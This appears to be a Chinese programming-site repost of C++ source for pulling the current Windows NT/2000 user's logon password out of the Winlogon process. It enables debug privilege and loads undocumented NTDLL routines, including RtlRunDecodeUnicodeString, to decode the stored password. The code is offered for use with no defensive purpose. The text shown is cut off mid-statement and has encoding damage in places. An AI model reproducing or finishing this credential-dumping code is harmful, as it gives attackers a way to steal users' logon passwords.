我们来自五湖四海,不为别的,只因有共同的爱好,为中国互联网发展出一分力!

C++中获取WinNT/Win2k当前用户名和密码

2013年04月28日03:40 阅读: 16049 次

??? // 获取WinNT/Win2k当前用户名和密码,调用以下函数即可:
??? // bool GetPassWord(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
??? //---------------------------------------------------------------------------
??? typedef strUCt _UNICODE_STRING
??? {
??????? USHORT Length;
??????? USHORT MaximumLength;
??????? PWSTR Buffer;
??? }UNICODE_STRING, *PUNICODE_STRING;
??? typedef struct _QUERY_SYSTEM_INFORMATION
??? {
??????? DWORD GrantedAccess;
??????? DWORD PID;
??????? WORD HandleType;
??????? WORD HandleId;
??????? DWORD Handle;
??? }QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
??? typedef struct _PROCESS_INFO_HEADER
??? {
??????? DWORD Count;
??????? DWORD Unk04;
??????? DWORD Unk08;
??? }PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
??? typedef struct _PROCESS_INFO
??? {
??????? DWORD LoadAddress;
??????? DWORD Size;
??????? DWORD Unk08;
??????? DWORD Enumerator;
??????? DWORD Unk10;
??????? char Name [0x108];
??? }PROCESS_INFO, *PPROCESS_INFO;
??? typedef struct _ENCODED_PASSWORD_INFO
??? {
??????? DWORD HashByte;
??????? DWORD Unk04;
??????? DWORD Unk08;
??????? DWORD Unk0C;
??????? FILETIME LoggedOn;
??????? DWORD Unk18;
??????? DWORD Unk1C;
??????? DWORD Unk20;
??????? DWORD Unk24;
??????? DWORD Unk28;
??????? UNICODE_STRING EncodedPassword;
??? }ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;

??? typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION)? (DWORD, PVOID, DWORD, PDWORD);
??? typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
??? typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
??? typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
??? typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING)? (BYTE, PUNICODE_STRING);

??? // Private Prototypes
??? BOOL IsWinNT(void);
??? BOOL IsWin2K(void);
??? BOOL AddDebugPrivilege(void);
??? DWORD FindWinLogon(void);
??? BOOL LocatePasswordPageWinNT(DWORD, PDWORD);
??? BOOL LocatePasswordPageWin2K(DWORD, PDWORD);
??? void ReturnWinNTPwd(String &, String &, String &);
??? void ReturnWin2kPwd(String &, String &, String &);
??? bool GetPassword(String &, String &, String &);

??? // Global Variables
??? PFNNTQUERYSYSTEMINFORMATION??????? pfnNtQuerySystemInformation;
??? PFNRTLCREATEQUERYDEBUGBUFFER?????? pfnRtlCreateQueryDebugBuffer;
??? PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
??? PFNRTLDESTROYQUERYDEBUGBUFFER????? pfnRtlDestroyQueryDebugBuffer;
??? PFNTRTLRUNDECODEUNICODESTRING????? pfnRtlRunDecodeUnicodeString;

??? DWORD dwPwdLen = 0;
??? PVOID pvRealPwd = NULL;
??? PVOID pvPwd = NULL;
??? DWORD dwHashByte = 0;
??? wchar_t wszUserName[0x400];
??? wchar_t wszUserDomain[0x400];
??? //---------------------------------------------------------------------------
??? bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
??? {
??????????? if(!IsWinNT() && !IsWin2K())
??????? {
??????????? // 只适合于2000或者XP
??????????? return false;
??????? }
??????? // Add debug privilege to PasswordReminder -
??????? // this is needed for the search for Winlogon.
??????? if(!AddDebugPrivilege())
??????? {
??????????? // 不能够添加debug特权
??????????? return false;
??????? }
??????? // debug特权已经成功加入到本程序
??????? HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL");
??????? pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION)
??????????????? GetProcAddress(hNtDll,"NtQuerySystemInformation");
??????? pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER)
??????????????? GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer");
??????? pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION)
??????????????? GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation");
??????? pfnRtlDestroyQueryDebugBuffer =??? (PFNRTLDESTROYQUERYDEBUGBUFFER)
??????????????? GetProcAddress(hNtDll,"RtlDestroyQueryDebugBuffer");
??????? pfnRtlRunDecodeUnicodeString =(PFNTRTLRUNDECODEUNICODESTRING)
??????????????? GetProcAddress(hNtDll,"RtlRunDecodeUnicodeString

分享到: 更多
蓝客门户